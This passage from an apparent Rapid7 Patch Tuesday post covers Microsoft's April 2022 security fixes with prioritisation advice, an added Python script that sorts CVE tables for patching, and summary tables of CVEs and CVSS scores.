a system they already have local access to. Another local privilege escalation (LPE), [CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>) affecting the Windows User Profile Service, had been publicly disclosed but not reported as already being exploited \u2013 it\u2019s harder for attackers to leverage as it relies on winning a race condition, which can be tricky to reliably achieve.\n\nLPEs don\u2019t always get the same attention that remote code execution (RCE) vulnerabilities do, but they can be a great help to attackers after they gain an initial foothold. These two categories dominate this month\u2019s vulnerabilities, with 55 LPEs and 47 RCEs getting patched. 
10 of the RCEs are considered \u201cCritical,\u201d affecting Windows Hyper-V ([CVE-2022-22008](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22008>), [CVE-2022-23257](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23257>), [CVE-2022-24537](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24537>)); Windows SMB Client ([CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>), [CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>)); Windows Network File System ([CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>)); LDAP ([CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>)); Microsoft Dynamics ([CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>)); and the Windows RPC Runtime ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>)).\n\nOn the Office side of the house, Skype for Business Server was patched for spoofing ([CVE-2022-26910](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26910>)) and information disclosure ([CVE-2022-26911](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26911>)) vulnerabilities. Two RCEs affecting Excel ([CVE-2022-24473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24473>) and [CVE-2022-26901](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26901>)) were fixed, as well as a spoofing vulnerability in SharePoint Server ([CVE-2022-24472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24472>)).\n\nWith so many vulnerabilities to manage, it can be difficult to prioritize. Thankfully, most of this month\u2019s CVEs can be addressed by patching the core OS. 
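As an added illustration of the prioritization this post recommends (example code written for this page, not Rapid7 tooling), the following Python parses advisory rows in the same Markdown-table shape as the summary tables that follow and orders them the way a patching team would: exploited in the wild first, then publicly disclosed, then remote code execution ranked by CVSSv3, with "N/A" scores (the Chromium rows) sinking to the bottom of their tier. The sample rows are copied from this page's tables, except the CVE-2022-24521 row, which is constructed from the prose above; its title and 7.8 score are assumed rather than taken from the page. The regex, the `Advisory` type and the tier ordering are all this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input in the same Markdown-table shape as the summary tables on this
# page. All rows but the first are copied from those tables; the CVE-2022-24521 row is
# built from the prose (exploited in the wild), with its title and 7.8 score assumed.
SAMPLE_ROWS = """\
CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ?
---|---|---|---|---|---
[CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Yes | No | 7.8 | Yes
[CVE-2022-26904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26904>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | Yes
[CVE-2022-24491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24491>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2022-24500](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24500>) | Windows SMB Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2022-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26898>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes
[CVE-2022-24483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24483>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2022-1232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1232>) | Chromium: CVE-2022-1232 Type Confusion in V8 | No | No | N/A | Yes
"""

# One data row of the summary tables:
#   [CVE-ID](<url>) | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ?
ROW_RE = re.compile(
    r"^\[(?P<cve>CVE-\d{4}-\d{4,})\]\(<[^>]*>\)\s*\|\s*(?P<title>.*?)\s*\|\s*"
    r"(?P<exploited>Yes|No)\s*\|\s*(?P<disclosed>Yes|No)\s*\|\s*"
    r"(?P<cvss>\d+(?:\.\d+)?|N/A)\s*\|\s*(?P<faq>Yes|No)\s*$"
)


@dataclass(frozen=True)
class Advisory:
    cve: str
    title: str
    exploited: bool
    disclosed: bool
    cvss: Optional[float]  # None when MSRC lists "N/A" (the Chromium rows)

    @property
    def is_rce(self) -> bool:
        return "Remote Code Execution" in self.title


def parse_rows(text: str) -> List[Advisory]:
    """Parse data rows; header and separator lines are skipped, a malformed CVE row is an error."""
    advisories = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("[CVE-"):
            continue  # column header, '---|---' separator or blank line
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"malformed table row: {line[:60]}")
        cvss = None if m["cvss"] == "N/A" else float(m["cvss"])
        advisories.append(Advisory(m["cve"], m["title"], m["exploited"] == "Yes",
                                   m["disclosed"] == "Yes", cvss))
    return advisories


def triage_key(a: Advisory):
    # Lower tuples sort first: exploited in the wild, then publicly disclosed, then RCE
    # before everything else, then higher CVSS first. A missing score sorts after any real one.
    score = a.cvss if a.cvss is not None else -1.0
    return (not a.exploited, not a.disclosed, not a.is_rce, -score)


def triage(advisories: List[Advisory]) -> List[Advisory]:
    return sorted(advisories, key=triage_key)


def priority_order(text: str) -> List[str]:
    """CVE identifiers in the order they should be patched."""
    return [a.cve for a in triage(parse_rows(text))]


def mitigation_note(a: Advisory) -> str:
    # The post's one network-level workaround: the SMB bugs need the victim to reach a hostile
    # server, so filtering 445/tcp at the perimeter blunts Internet-based attackers (not insiders).
    if "SMB" in a.title:
        return "patch; also block 445/tcp at the perimeter"
    return "patch"


if __name__ == "__main__":
    for rank, adv in enumerate(triage(parse_rows(SAMPLE_ROWS)), start=1):
        flags = ("exploited " if adv.exploited else "") + ("disclosed " if adv.disclosed else "")
        print(f"{rank:2d} {adv.cve:15s} {adv.cvss!s:>5} {flags:20s} {mitigation_note(adv)}")
```

Feed it the full MSRC tables for a month and the exploited and disclosed rows surface first regardless of their base score, which matches the point made above about CVE-2022-24521: a 7.8 LPE that is already being used beats a 9.8 RCE nobody has weaponised yet.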
Administrators should first focus on updating any public-facing servers before moving on to internal servers and then client systems. The SMB Client vulnerabilities can also be mitigated by blocking port 445/tcp at the network perimeter \u2013 victims need to be enticed to connect to a malicious SMB server, and this would help against Internet-based attackers. Of course, this won\u2019t help much if the malicious system was set up within the perimeter.\n\nFor any readers who enjoy deeper dives into vulnerabilities and exploits, Rapid7\u2019s Jake Baines has a [technical writeup](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>) of [CVE-2022-24527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24527>), an LPE he discovered in the Connected Cache component of Microsoft Endpoint Manager that got fixed today. Check it out!\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Azure Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26898>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26896>) | Azure Site Recovery Information Disclosure Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26897>) | Azure Site Recovery Information Disclosure Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-26907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26907>) | Azure SDK for .NET Information Disclosure Vulnerability | No | No | 5.3 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-24523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24523>) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | No | No | 4.3 | Yes \n[CVE-2022-24475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24475>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26891>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26894>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26895>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26900>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26908>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26909](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26909>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26912>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-1232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1232>) | Chromium: CVE-2022-1232 Type Confusion in V8 | No | No | N/A | Yes 
\n[CVE-2022-1146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1146>) | Chromium: CVE-2022-1146 Inappropriate implementation in Resource Timing | No | No | N/A | Yes \n[CVE-2022-1145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1145>) | Chromium: CVE-2022-1145 Use after free in Extensions | No | No | N/A | Yes \n[CVE-2022-1143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1143>) | Chromium: CVE-2022-1143 Heap buffer overflow in WebUI | No | No | N/A | Yes \n[CVE-2022-1139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1139>) | Chromium: CVE-2022-1139 Inappropriate implementation in Background Fetch API | No | No | N/A | Yes \n[CVE-2022-1138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1138>) | Chromium: CVE-2022-1138 Inappropriate implementation in Web Cursor | No | No | N/A | Yes \n[CVE-2022-1137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1137>) | Chromium: CVE-2022-1137 Inappropriate implementation in Extensions | No | No | N/A | Yes \n[CVE-2022-1136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1136>) | Chromium: CVE-2022-1136 Use after free in Tab Strip | No | No | N/A | Yes \n[CVE-2022-1135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1135>) | Chromium: CVE-2022-1135 Use after free in Shopping Cart | No | No | N/A | Yes \n[CVE-2022-1134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1134>) | Chromium: CVE-2022-1134 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2022-1133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1133>) | Chromium: CVE-2022-1133 Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2022-1131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1131>) | Chromium: CVE-2022-1131 Use after free in 
Cast UI | No | No | N/A | Yes \n[CVE-2022-1130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1130>) | Chromium: CVE-2022-1130 Insufficient validation of untrusted input in WebOTP | No | No | N/A | Yes \n[CVE-2022-1129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1129>) | Chromium: CVE-2022-1129 Inappropriate implementation in Full Screen Mode | No | No | N/A | Yes \n[CVE-2022-1128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1128>) | Chromium: CVE-2022-1128 Inappropriate implementation in Web Share API | No | No | N/A | Yes \n[CVE-2022-1127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1127>) | Chromium: CVE-2022-1127 Use after free in QR Code Generator | No | No | N/A | Yes \n[CVE-2022-1125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1125>) | Chromium: CVE-2022-1125 Use after free in Portals | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-26924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26924>) | YARP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24513](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24513>) | Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26921](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26921>) | Visual Studio Code Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2022-24765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24765>) | GitHub: Uncontrolled search for the Git directory in Git for Windows | No | No | N/A | Yes \n[CVE-2022-24767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24767>) | GitHub: Git for Windows' uninstaller vulnerable to DLL hijacking when run under the SYSTEM user account | No | No | N/A | Yes \n[CVE-2022-26832](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26832>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-23259](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23259>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n \n### Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-26910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26910>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 5.3 | Yes \n[CVE-2022-26911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26911>) | Skype for Business Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-24472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24472>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2022-24473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24473>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26901>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### SQL Server Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-23292](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23292>) | Microsoft Power BI Spoofing Vulnerability | No | No | 5.9 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24548](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24548>) | Microsoft Defender Denial of Service Vulnerability | No | No | 5.5 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-24543](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24543>) | Windows Upgrade Assistant Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24550](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24550>) | Windows Telephony Server Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26786>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26789](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26789>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26791>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26793>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26795>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24491>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24497>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24487>) | Windows Local Security Authority (LSA) Remote Code Execution Vulnerability | No | No | 8.8 | Yes 
\n[CVE-2022-24483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24483>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-24545](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24545>) | Windows Kerberos Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-24486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24486>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24490>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-24539](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24539>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-26783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26783>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26785>) | Windows Hyper-V Shared Virtual Hard Disks Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-23257](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23257>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-22008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22008>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24537>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes 
\n[CVE-2022-22009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22009>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-23268](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23268>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26920>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-26808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26808>) | Windows File Explorer Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24495](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24495>) | Windows Direct Show - Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2022-24547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24547>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24488>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24546](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24546>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26811>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26823](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26823>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26824>) | Windows DNS Server Remote Code 
Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26825](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26825>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26826](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26826>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26814>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26817](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26817>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26818](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26818>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes \n[CVE-2022-26816](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26816>) | Windows DNS Server Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-24538](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24538>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-26784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26784>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-24484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24484>) | Windows Cluster Shared Volume (CSV) Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2022-26828](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26828>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7 | Yes 
\n[CVE-2022-24549](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24549>) | Windows AppX Package Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24482>) | Windows ALPC Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26914](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26914>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26788>) | PowerShell Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24496>) | Local Security Authority (LSA) Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24532>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26830>) | DiskUsage.exe Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24479>) | Connected User Experiences and Telemetry Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-24489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24489>) | Cluster Client Failover (CCF) Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n### Windows ESU Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
---|---|---|---|---|---
[CVE-2022-24498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24498>) | Windows iSCSI Target Service Information Disclosure Vulnerability | No | No | 6.5 | Yes
[CVE-2022-26807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26807>) | Windows Work Folder Service Elevation of Privilege Vulnerability | No | No | 7 | Yes
[CVE-2022-24474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24474>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-24542](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24542>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26904>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | Yes
[CVE-2022-24541](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24541>) | Windows Server Service Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2022-26915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26915>) | Windows Secure Channel Denial of Service Vulnerability | No | No | 7.5 | No
[CVE-2022-24500](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24500>) | Windows SMB Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2022-26787](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26787>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26790>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26792>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26794>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26796>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26797>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26798>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26801](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26801>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
